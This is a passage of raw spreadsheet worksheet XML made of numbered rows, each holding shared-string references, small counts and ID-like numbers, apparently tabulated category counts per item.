        <v>5492</v>
      </c>
    </row>
    <row r="20177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20177" t="s">
        <v>16228</v>
      </c>
      <c r="B20177" t="s">
        <v>16217</v>
      </c>
      <c r="C20177">
        <v>5</v>
      </c>
      <c r="D20177">
        <v>1017</v>
      </c>
    </row>
    <row r="20178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20178" t="s">
        <v>16231</v>
      </c>
      <c r="B20178" t="s">
        <v>16218</v>
      </c>
      <c r="C20178">
        <v>0</v>
      </c>
      <c r="D20178">
        <v>1017</v>
      </c>
    </row>
    <row r="20179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20179" t="s">
        <v>16229</v>
      </c>
      <c r="B20179" t="s">
        <v>16221</v>
      </c>
      <c r="C20179">
        <v>0</v>
      </c>
      <c r="D20179">
        <v>1017</v>
      </c>
    </row>
    <row r="20180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20180" t="s">
        <v>16230</v>
      </c>
      <c r="B20180" t="s">
        <v>16222</v>
      </c>
      <c r="C20180">
        <v>0</v>
      </c>
      <c r="D20180">
        <v>1017</v>
      </c>
    </row>
    <row r="20181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20181" t="s">
        <v>16224</v>
      </c>
      <c r="B20181" t="s">
        <v>16224</v>
      </c>
      <c r="C20181">
        <v>1</v>
      </c>
      <c r="D20181">
        <v>1017</v>
      </c>
    </row>
    <row r="20182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20182" t="s">
        <v>16228</v>
      </c>
      <c r="B20182" t="s">
        <v>16211</v>
      </c>
      <c r="C20182">
        <v>0</v>
      </c>
      <c r="D20182">
        <v>1933</v>
      </c>
    </row>
    <row r="20183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20183" t="s">
        <v>16231</v>
      </c>
      <c r="B20183" t="s">
        <v>16212</v>
      </c>
      <c r="C20183">
        <v>0</v>
      </c>
      <c r="D20183">
        <v>1933</v>
      </c>
    </row>
    <row r="20184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20184" t="s">
        <v>16228</v>
      </c>
      <c r="B20184" t="s">
        <v>16213</v>
      </c>
      <c r="C20184">
        <v>0</v>
      </c>
      <c r="D20184">
        <v>1933</v>
      </c>
    </row>
    <row r="20185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20185" t="s">
        <v>16231</v>
      </c>
      <c r="B20185" t="s">
        <v>16214</v>
      </c>
      <c r="C20185">
        <v>0</v>
      </c>
      <c r="D20185">
        <v>1933</v>
      </c>
    </row>
    <row r="20186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20186" t="s">
        <v>16228</v>
      </c>
      <c r="B20186" t="s">
        <v>16215</v>
      </c>
      <c r="C20186">
        <v>4</v>
      </c>
      <c r="D20186">
        <v>1933</v>
      </c>
    </row>
    <row r="20187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20187" t="s">
        <v>16231</v>
      </c>
      <c r="B20187" t="s">
        <v>16216</v>
      </c>
      <c r="C20187">
        <v>8</v>
      </c>
      <c r="D20187">
        <v>1933</v>
      </c>
    </row>
    <row r="20188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20188" t="s">
        <v>16228</v>
      </c>
      <c r="B20188" t="s">
        <v>16217</v>
      </c>
      <c r="C20188">
        <v>8</v>
      </c>
      <c r="D20188">
        <v>1933</v>
      </c>
    </row>
    <row r="20189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20189" t="s">
        <v>16231</v>
      </c>
      <c r="B20189" t="s">
        <v>16218</v>
      </c>
      <c r="C20189">
        <v>10</v>
      </c>
      <c r="D20189">
        <v>1933</v>
      </c>
    </row>
    <row r="20190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20190" t="s">
        <v>16229</v>
      </c>
      <c r="B20190" t="s">
        <v>16219</v>
      </c>
      <c r="C20190">
        <v>0</v>
      </c>
      <c r="D20190">
        <v>1933</v>
      </c>
    </row>
    <row r="20191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20191" t="s">
        <v>16230</v>
      </c>
      <c r="B20191" t="s">
        <v>16220</v>
      </c>
      <c r="C20191">
        <v>5</v>
      </c>
      <c r="D20191">
        <v>1933</v>
      </c>
    </row>
    <row r="20192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20192" t="s">
        <v>16229</v>
      </c>
      <c r="B20192" t="s">
        <v>16221</v>
      </c>
      <c r="C20192">
        <v>16</v>
      </c>
      <c r="D20192">
        <v>1933</v>
      </c>
    </row>
    <row r="20193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20193" t="s">
        <v>16230</v>
      </c>
      <c r="B20193" t="s">
        <v>16222</v>
      </c>
      <c r="C20193">
        <v>69</v>
      </c>
      <c r="D20193">
        <v>1933</v>
      </c>
    </row>
    <row r="20194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20194" t="s">
        <v>16223</v>
      </c>
      <c r="B20194" t="s">
        <v>16223</v>
      </c>
      <c r="C20194">
        <v>20</v>
      </c>
      <c r="D20194">
        <v>1933</v>
      </c>
    </row>
    <row r="20195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20195" t="s">
        <v>16224</v>
      </c>
      <c r="B20195" t="s">
        <v>16224</v>
      </c>
      <c r="C20195">
        <v>0</v>
      </c>
      <c r="D20195">
        <v>1933</v>
      </c>
    </row>
    <row r="20196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20196" t="s">
        <v>16228</v>
      </c>
      <c r="B20196" t="s">
        <v>16211</v>
      </c>
      <c r="C20196">
        <v>0</v>
      </c>
      <c r="D20196">
        <v>5549</v>
      </c>
    </row>
    <row r="20197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20197" t="s">
        <v>16231</v>
      </c>
      <c r="B20197" t="s">
        <v>16212</v>
      </c>
      <c r="C20197">
        <v>0</v>
      </c>
      <c r="D20197">
        <v>5549</v>
      </c>
    </row>
    <row r="20198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20198" t="s">
        <v>16228</v>
      </c>
      <c r="B20198" t="s">
        <v>16213</v>
      </c>
      <c r="C20198">
        <v>0</v>
      </c>
      <c r="D20198">
        <v>5549</v>
      </c>
    </row>
    <row r="20199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20199" t="s">
        <v>16231</v>
      </c>
      <c r="B20199" t="s">
        <v>16214</v>
      </c>
      <c r="C20199">
        <v>0</v>
      </c>
      <c r="D20199">
        <v>5549</v>
      </c>
    </row>
    <row r="20200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20200" t="s">
        <v>16228</v>
      </c>
      <c r="B20200" t="s">
        <v>16215</v>
      </c>
      <c r="C20200">
        <v>2</v>
      </c>
      <c r="D20200">
        <v>5549</v>
      </c>
    </row>
    <row r="20201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20201" t="s">
        <v>16231</v>
      </c>
      <c r="B20201" t="s">
        <v>16216</v>
      </c>
      <c r="C20201">
        <v>2</v>
      </c>
      <c r="D20201">
        <v>5549</v>
      </c>
    </row>
    <row r="20202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20202" t="s">
        <v>16228</v>
      </c>
      <c r="B20202" t="s">
        <v>16217</v>
      </c>
      <c r="C20202">
        <v>2</v>
      </c>
      <c r="D20202">
        <v>5549</v>
      </c>
    </row>
    <row r="20203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20203" t="s">
        <v>16231</v>
      </c>
      <c r="B20203" t="s">
        <v>16218</v>
      </c>
      <c r="C20203">
        <v>2</v>
      </c>
      <c r="D20203">
        <v>5549</v>
      </c>
    </row>
    <row r="20204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20204" t="s">
        <v>16229</v>
      </c>
      <c r="B20204" t="s">
        <v>16219</v>
      </c>
      <c r="C20204">
        <v>0</v>
      </c>
      <c r="D20204">
        <v>5549</v>
      </c>
    </row>
    <row r="20205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20205" t="s">
        <v>16230</v>
      </c>
      <c r="B20205" t="s">
        <v>16220</v>
      </c>
      <c r="C20205">
        <v>0</v>
      </c>
      <c r="D20205">
        <v>5549</v>
      </c>
    </row>
    <row r="20206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20206" t="s">
        <v>16229</v>
      </c>
      <c r="B20206" t="s">
        <v>16221</v>
      </c>
      <c r="C20206">
        <v>13</v>
      </c>
      <c r="D20206">
        <v>5549</v>
      </c>
    </row>
    <row r="20207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20207" t="s">
        <v>16230</v>
      </c>
      <c r="B20207" t="s">
        <v>16222</v>
      </c>
      <c r="C20207">
        <v>12</v>
      </c>
      <c r="D20207">
        <v>5549</v>
      </c>
    </row>
    <row r="20208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20208" t="s">
        <v>16223</v>
      </c>
      <c r="B20208" t="s">
        <v>16223</v>
      </c>
      <c r="C20208">
        <v>1</v>
      </c>
      <c r="D20208">
        <v>5549</v>
      </c>
    </row>
    <row r="20209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20209" t="s">
        <v>16224</v>
      </c>
      <c r="B20209" t="s">
        <v>16224</v>
      </c>
      <c r="C20209">
        <v>1</v>
      </c>
      <c r="D20209">
        <v>5549</v>
      </c>
    </row>
    <row r="20210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20210" t="s">
        <v>16228</v>
      </c>
      <c r="B20210" t="s">
        <v>16211</v>
      </c>
      <c r="C20210">
        <v>0</v>
      </c>
      <c r="D20210">
        <v>5332</v>
      </c>
    </row>
    <row r="20211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20211" t="s">
        <v>16231</v>
      </c>
      <c r="B20211" t="s">
        <v>16212</v>
      </c>
      <c r="C20211">
        <v>0</v>
      </c>
      <c r="D20211">
        <v>5332</v>
      </c>
    </row>
    <row r="20212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20212" t="s">
        <v>16228</v>
      </c>
      <c r="B20212" t="s">
        <v>16213</v>
      </c>
      <c r="C20212">
        <v>0</v>
      </c>
      <c r="D20212">
        <v>5332</v>
      </c>
    </row>
    <row r="20213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20213" t="s">
        <v>16231</v>
      </c>
      <c r="B20213" t="s">
        <v>16214</v>
      </c>
      <c r="C20213">
        <v>0</v>
      </c>
      <c r="D20213">
        <v>5332</v>
      </c>
    </row>
    <row r="20214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20214" t="s">
        <v>16228</v>
      </c>
      <c r="B20214" t="s">
        <v>16215</v>
      </c>
      <c r="C20214">
        <v>1</v>
      </c>
      <c r="D20214">
        <v>5332</v>
      </c>
    </row>
    <row r="20215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20215" t="s">
        <v>16231</v>
      </c>
      <c r="B20215" t="s">
        <v>16216</v>
      </c>
      <c r="C20215">
        <v>1</v>
      </c>
      <c r="D20215">
        <v>5332</v>
      </c>
    </row>
    <row r="20216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20216" t="s">
        <v>16228</v>
      </c>
      <c r="B20216" t="s">
        <v>16217</v>
      </c>
      <c r="C20216">
        <v>10</v>
      </c>
      <c r="D20216">
        <v>5332</v>
      </c>
    </row>
    <row r="20217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20217" t="s">
        <v>16231</v>
      </c>
      <c r="B20217" t="s">
        <v>16218</v>
      </c>
      <c r="C20217">
        <v>5</v>
      </c>
      <c r="D20217">
        <v>5332</v>
      </c>
    </row>
    <row r="20218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20218" t="s">
        <v>16229</v>
      </c>
      <c r="B20218" t="s">
        <v>16219</v>
      </c>
      <c r="C20218">
        <v>0</v>
      </c>
      <c r="D20218">
        <v>5332</v>
      </c>
    </row>
    <row r="20219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20219" t="s">
        <v>16230</v>
      </c>
      <c r="B20219" t="s">
        <v>16220</v>
      </c>
      <c r="C20219">
        <v>0</v>
      </c>
      <c r="D20219">
        <v>5332</v>
      </c>
    </row>
    <row r="20220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20220" t="s">
        <v>16229</v>
      </c>
      <c r="B20220" t="s">
        <v>16221</v>
      </c>
      <c r="C20220">
        <v>0</v>
      </c>
      <c r="D20220">
        <v>5332</v>
      </c>
    </row>
    <row r="20221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20221" t="s">
        <v>16230</v>
      </c>
      <c r="B20221" t="s">
        <v>16222</v>
      </c>
      <c r="C20221">
        <v>0</v>
      </c>
      <c r="D20221">
        <v>5332</v>
      </c>
    </row>
    <row r="20222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20222" t="s">
        <v>16223</v>
      </c>
      <c r="B20222" t="s">
        <v>16223</v>
      </c>
      <c r="C20222">
        <v>0</v>
      </c>
      <c r="D20222">
        <v>5332</v>
      </c>
    </row>
    <row r="20223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20223" t="s">
        <v>16224</v>
      </c>
      <c r="B20223" t="s">
        <v>16224</v>
      </c>
      <c r="C20223">
        <v>0</v>
      </c>
      <c r="D20223">
        <v>5332</v>
      </c>
    </row>
    <row r="20224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20224" t="s">
        <v>16228</v>
      </c>
      <c r="B20224" t="s">
        <v>16211</v>
      </c>
      <c r="C20224">
        <v>0</v>
      </c>
      <c r="D20224">
        <v>1471</v>
      </c>
    </row>
    <row r="20225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20225" t="s">
        <v>16231</v>
      </c>
      <c r="B20225" t="s">
        <v>16212</v>
      </c>
      <c r="C20225">
        <v>0</v>
      </c>
      <c r="D20225">
        <v>1471</v>
      </c>
    </row>
    <row r="20226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20226" t="s">
        <v>16228</v>
      </c>
      <c r="B20226" t="s">
        <v>16213</v>
      </c>
      <c r="C20226">
        <v>0</v>
      </c>
      <c r="D20226">
        <v>1471</v>
      </c>
    </row>
    <row r="20227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20227" t="s">
        <v>16231</v>
      </c>
      <c r="B20227" t="s">
        <v>16214</v>
      </c>
      <c r="C20227">
        <v>0</v>
      </c>
      <c r="D20227">
        <v>1471</v>
      </c>
    </row>
    <row r="20228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20228" t="s">
        <v>16228</v>
      </c>
      <c r="B20228" t="s">
        <v>16215</v>
      </c>
      <c r="C20228">
        <v>1</v>
      </c>
      <c r="D20228">
        <v>1471</v>
      </c>
    </row>
    <row r="20229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20229" t="s">
        <v>16231</v>
      </c>
      <c r="B20229" t="s">
        <v>16216</v>
      </c>
      <c r="C20229">
        <v>0</v>
      </c>
      <c r="D20229">
        <v>1471</v>
      </c>
    </row>
    <row r="20230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20230" t="s">
        <v>16228</v>
      </c>
      <c r="B20230" t="s">
        <v>16217</v>
      </c>
      <c r="C20230">
        <v>4</v>
      </c>
      <c r="D20230">
        <v>1471</v>
      </c>
    </row>
    <row r="20231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20231" t="s">
        <v>16231</v>
      </c>
      <c r="B20231" t="s">
        <v>16218</v>
      </c>
      <c r="C20231">
        <v>1</v>
      </c>
      <c r="D20231">
        <v>1471</v>
      </c>
    </row>
    <row r="20232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20232" t="s">
        <v>16229</v>
      </c>
      <c r="B20232" t="s">
        <v>16219</v>
      </c>
      <c r="C20232">
        <v>0</v>
      </c>
      <c r="D20232">
        <v>1471</v>
      </c>
    </row>
    <row r="20233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20233" t="s">
        <v>16230</v>
      </c>
      <c r="B20233" t="s">
        <v>16220</v>
      </c>
      <c r="C20233">
        <v>0</v>
      </c>
      <c r="D20233">
        <v>1471</v>
      </c>
    </row>
    <row r="20234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20234" t="s">
        <v>16229</v>
      </c>
      <c r="B20234" t="s">
        <v>16221</v>
      </c>
      <c r="C20234">
        <v>4</v>
      </c>
      <c r="D20234">
        <v>1471</v>
      </c>
    </row>
    <row r="20235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20235" t="s">
        <v>16230</v>
      </c>
      <c r="B20235" t="s">
        <v>16222</v>
      </c>
      <c r="C20235">
        <v>0</v>
      </c>
      <c r="D20235">
        <v>1471</v>
      </c>
    </row>
    <row r="20236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20236" t="s">
        <v>16223</v>
      </c>
      <c r="B20236" t="s">
        <v>16223</v>
      </c>
      <c r="C20236">
        <v>26</v>
      </c>
      <c r="D20236">
        <v>1471</v>
      </c>
    </row>
    <row r="20237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20237" t="s">
        <v>16224</v>
      </c>
      <c r="B20237" t="s">
        <v>16224</v>
      </c>
      <c r="C20237">
        <v>1</v>
      </c>
      <c r="D20237">
        <v>1471</v>
      </c>
    </row>
    <row r="20238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20238" t="s">
        <v>16228</v>
      </c>
      <c r="B20238" t="s">
        <v>16211</v>
      </c>
      <c r="C20238">
        <v>0</v>
      </c>
      <c r="D20238">
        <v>296</v>
      </c>
    </row>
    <row r="20239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20239" t="s">
        <v>16231</v>
      </c>
      <c r="B20239" t="s">
        <v>16212</v>
      </c>
      <c r="C20239">
        <v>0</v>
      </c>
      <c r="D20239">
        <v>296</v>
      </c>
    </row>
    <row r="20240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20240" t="s">
        <v>16228</v>
      </c>
      <c r="B20240" t="s">
        <v>16213</v>
      </c>
      <c r="C20240">
        <v>0</v>
      </c>
      <c r="D20240">
        <v>296</v>
      </c>
    </row>
    <row r="20241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20241" t="s">
        <v>16231</v>
      </c>
      <c r="B20241" t="s">
        <v>16214</v>
      </c>
      <c r="C20241">
        <v>0</v>
      </c>
      <c r="D20241">
        <v>296</v>
      </c>
    </row>
    <row r="20242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20242" t="s">
        <v>16228</v>
      </c>
      <c r="B20242" t="s">
        <v>16215</v>
      </c>
      <c r="C20242">
        <v>6</v>
      </c>
      <c r="D20242">
        <v>296</v>
      </c>
    </row>
    <row r="20243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20243" t="s">
        <v>16231</v>
      </c>
      <c r="B20243" t="s">
        <v>16216</v>
      </c>
      <c r="C20243">
        <v>1</v>
      </c>
      <c r="D20243">
        <v>296</v>
      </c>
    </row>
    <row r="20244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20244" t="s">
        <v>16228</v>
      </c>
      <c r="B20244" t="s">
        <v>16217</v>
      </c>
      <c r="C20244">
        <v>0</v>
      </c>
      <c r="D20244">
        <v>296</v>
      </c>
    </row>
    <row r="20245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20245" t="s">
        <v>16231</v>
      </c>
      <c r="B20245" t="s">
        <v>16218</v>
      </c>
      <c r="C20245">
        <v>0</v>
      </c>
      <c r="D20245">
        <v>296</v>
      </c>
    </row>
    <row r="20246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20246" t="s">
        <v>16229</v>
      </c>
      <c r="B20246" t="s">
        <v>16219</v>
      </c>
      <c r="C20246">
        <v>4</v>
      </c>
      <c r="D20246">
        <v>296</v>
      </c>
    </row>
    <row r="20247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20247" t="s">
        <v>16230</v>
      </c>
      <c r="B20247" t="s">
        <v>16220</v>
      </c>
      <c r="C20247">
        <v>3</v>
      </c>
      <c r="D20247">
        <v>296</v>
      </c>
    </row>
    <row r="20248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20248" t="s">
        <v>16229</v>
      </c>
      <c r="B20248" t="s">
        <v>16221</v>
      </c>
      <c r="C20248">
        <v>149</v>
      </c>
      <c r="D20248">
        <v>296</v>
      </c>
    </row>
    <row r="20249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20249" t="s">
        <v>16230</v>
      </c>
      <c r="B20249" t="s">
        <v>16222</v>
      </c>
      <c r="C20249">
        <v>111</v>
      </c>
      <c r="D20249">
        <v>296</v>
      </c>
    </row>
    <row r="20250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20250" t="s">
        <v>16223</v>
      </c>
      <c r="B20250" t="s">
        <v>16223</v>
      </c>
      <c r="C20250">
        <v>25</v>
      </c>
      <c r="D20250">
        <v>296</v>
      </c>
    </row>
    <row r="20251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20251" t="s">
        <v>16224</v>
      </c>
      <c r="B20251" t="s">
        <v>16224</v>
      </c>
      <c r="C20251">
        <v>2</v>
      </c>
      <c r="D20251">
        <v>296</v>
      </c>
    </row>
    <row r="20252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20252" t="s">
        <v>16228</v>
      </c>
      <c r="B20252" t="s">
        <v>16211</v>
      </c>
      <c r="C20252">
        <v>0</v>
      </c>
      <c r="D20252">
        <v>5671</v>
      </c>
    </row>
    <row r="20253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20253" t="s">
        <v>16231</v>
      </c>
      <c r="B20253" t="s">
        <v>16212</v>
      </c>
      <c r="C20253">
        <v>0</v>
      </c>
      <c r="D20253">
        <v>5671</v>
      </c>
    </row>
    <row r="20254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20254" t="s">
        <v>16228</v>
      </c>
      <c r="B20254" t="s">
        <v>16213</v>
      </c>
      <c r="C20254">
        <v>0</v>
      </c>
      <c r="D20254">
        <v>5671</v>
      </c>
    </row>
    <row r="20255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20255" t="s">
        <v>16231</v>
      </c>
      <c r="B20255" t="s">
        <v>16214</v>
      </c>
      <c r="C20255">
        <v>0</v>
      </c>
      <c r="D20255">
        <v>5671</v>
      </c>
    </row>
    <row r="20256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20256" t="s">
        <v>16228</v>
      </c>
      <c r="B20256" t="s">
        <v>16215</v>
      </c>
      <c r="C20256">
        <v>2</v>
      </c>
      <c r="D20256">
        <v>5671</v>
      </c>
    </row>
    <row r="20257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20257" t="s">
        <v>16231</v>
      </c>
      <c r="B20257" t="s">
        <v>16216</v>
      </c>
      <c r="C20257">
        <v>3</v>
      </c>
      <c r="D20257">
        <v>5671</v>
      </c>
    </row>
    <row r="20258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20258" t="s">
        <v>16228</v>
      </c>
      <c r="B20258" t="s">
        <v>16217</v>
      </c>
      <c r="C20258">
        <v>0</v>
      </c>
      <c r="D20258">
        <v>5671</v>
      </c>
    </row>
    <row r="20259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20259" t="s">
        <v>16231</v>
      </c>
      <c r="B20259" t="s">
        <v>16218</v>
      </c>
      <c r="C20259">
        <v>0</v>
      </c>
      <c r="D20259">
        <v>5671</v>
      </c>
    </row>
    <row r="20260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20260" t="s">
        <v>16229</v>
      </c>
      <c r="B20260" t="s">
        <v>16219</v>
      </c>
      <c r="C20260">
        <v>0</v>
      </c>
      <c r="D20260">
        <v>5671</v>
      </c>
    </row>
    <row r="20261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20261" t="s">
        <v>16230</v>
      </c>
      <c r="B20261" t="s">
        <v>16220</v>
      </c>
      <c r="C20261">
        <v>0</v>
      </c>
      <c r="D20261">
        <v>5671</v>
      </c>
    </row>
    <row r="20262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20262" t="s">
        <v>16229</v>
      </c>
      <c r="B20262" t="s">
        <v>16221</v>
      </c>
      <c r="C20262">
        <v>10</v>
      </c>
      <c r="D20262">
        <v>5671</v>
      </c>
    </row>
    <row r="20263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20263" t="s">
        <v>16230</v>
      </c>
      <c r="B20263" t="s">
        <v>16222</v>
      </c>
      <c r="C20263">
        <v>2</v>
      </c>
      <c r="D20263">
        <v>5671</v>
      </c>
    </row>
    <row r="20264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20264" t="s">
        <v>16223</v>
      </c>
      <c r="B20264" t="s">
        <v>16223</v>
      </c>
      <c r="C20264">
        <v>26</v>
      </c>
      <c r="D20264">
        <v>5671</v>
      </c>
    </row>
    <row r="20265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20265" t="s">
        <v>16224</v>
      </c>
      <c r="B20265" t="s">
        <v>16224</v>
      </c>
      <c r="C20265">
        <v>0</v>
      </c>
      <c r="D20265">
        <v>5671</v>
      </c>
    </row>
    <row r="20266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20266" t="s">
        <v>16228</v>
      </c>
      <c r="B20266" t="s">
        <v>16211</v>
      </c>
      <c r="C20266">
        <v>0</v>
      </c>
      <c r="D20266">
        <v>5672</v>
      </c>
    </row>
    <row r="20267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20267" t="s">
        <v>16231</v>
      </c>
      <c r="B20267" t="s">
        <v>16212</v>
      </c>
      <c r="C20267">
        <v>0</v>
      </c>
      <c r="D20267">
        <v>5672</v>
      </c>
    </row>
    <row r="20268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20268" t="s">
        <v>16228</v>
      </c>
      <c r="B20268" t="s">
        <v>16213</v>
      </c>
      <c r="C20268">
        <v>0</v>
      </c>
      <c r="D20268">
        <v>5672</v>
      </c>
    </row>
    <row r="20269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20269" t="s">
        <v>16231</v>
      </c>
      <c r="B20269" t="s">
        <v>16214</v>
      </c>
      <c r="C20269">
        <v>0</v>
      </c>
      <c r="D20269">
        <v>5672</v>
      </c>
    </row>
    <row r="20270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20270" t="s">
        <v>16228</v>
      </c>
      <c r="B20270" t="s">
        <v>16215</v>
      </c>
      <c r="C20270">
        <v>1</v>
      </c>
      <c r="D20270">
        <v>5672</v>
      </c>
    </row>
    <row r="20271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20271" t="s">
        <v>16231</v>
      </c>
      <c r="B20271" t="s">
        <v>16216</v>
      </c>
      <c r="C20271">
        <v>0</v>
      </c>
      <c r="D20271">
        <v>5672</v>
      </c>
    </row>
    <row r="20272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20272" t="s">
        <v>16228</v>
      </c>
      <c r="B20272" t="s">
        <v>16217</v>
      </c>
      <c r="C20272">
        <v>3</v>
      </c>
      <c r="D20272">
        <v>5672</v>
      </c>
    </row>
    <row r="20273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20273" t="s">
        <v>16231</v>
      </c>
      <c r="B20273" t="s">
        <v>16218</v>
      </c>
      <c r="C20273">
        <v>2</v>
      </c>
      <c r="D20273">
        <v>5672</v>
      </c>
    </row>
    <row r="20274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20274" t="s">
        <v>16229</v>
      </c>
      <c r="B20274" t="s">
        <v>16219</v>
      </c>
      <c r="C20274">
        <v>5</v>
      </c>
      <c r="D20274">
        <v>5672</v>
      </c>
    </row>
    <row r="20275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20275" t="s">
        <v>16230</v>
      </c>
      <c r="B20275" t="s">
        <v>16220</v>
      </c>
      <c r="C20275">
        <v>10</v>
      </c>
      <c r="D20275">
        <v>5672</v>
      </c>
    </row>
    <row r="20276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20276" t="s">
        <v>16229</v>
      </c>
      <c r="B20276" t="s">
        <v>16221</v>
      </c>
      <c r="C20276">
        <v>67</v>
      </c>
      <c r="D20276">
        <v>5672</v>
      </c>
    </row>
    <row r="20277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20277" t="s">
        <v>16230</v>
      </c>
      <c r="B20277" t="s">
        <v>16222</v>
      </c>
      <c r="C20277">
        <v>146</v>
      </c>
      <c r="D20277">
        <v>5672</v>
      </c>
    </row>
    <row r="20278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20278" t="s">
        <v>16223</v>
      </c>
      <c r="B20278" t="s">
        <v>16223</v>
      </c>
      <c r="C20278">
        <v>24</v>
      </c>
      <c r="D20278">
        <v>5672</v>
      </c>
    </row>
    <row r="20279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20279" t="s">
        <v>16224</v>
      </c>
      <c r="B20279" t="s">
        <v>16224</v>
      </c>
      <c r="C20279">
        <v>1</v>
      </c>
      <c r="D20279">
        <v>5672</v>
      </c>
    </row>
    <row r="20280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20280" t="s">
        <v>16228</v>
      </c>
      <c r="B20280" t="s">
        <v>16211</v>
      </c>
      <c r="C20280">
        <v>0</v>
      </c>
      <c r="D20280">
        <v>5640</v>
      </c>
    </row>
    <row r="20281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20281" t="s">
        <v>16231</v>
      </c>
      <c r="B20281" t="s">
        <v>16212</v>
      </c>
      <c r="C20281">
        <v>0</v>
      </c>
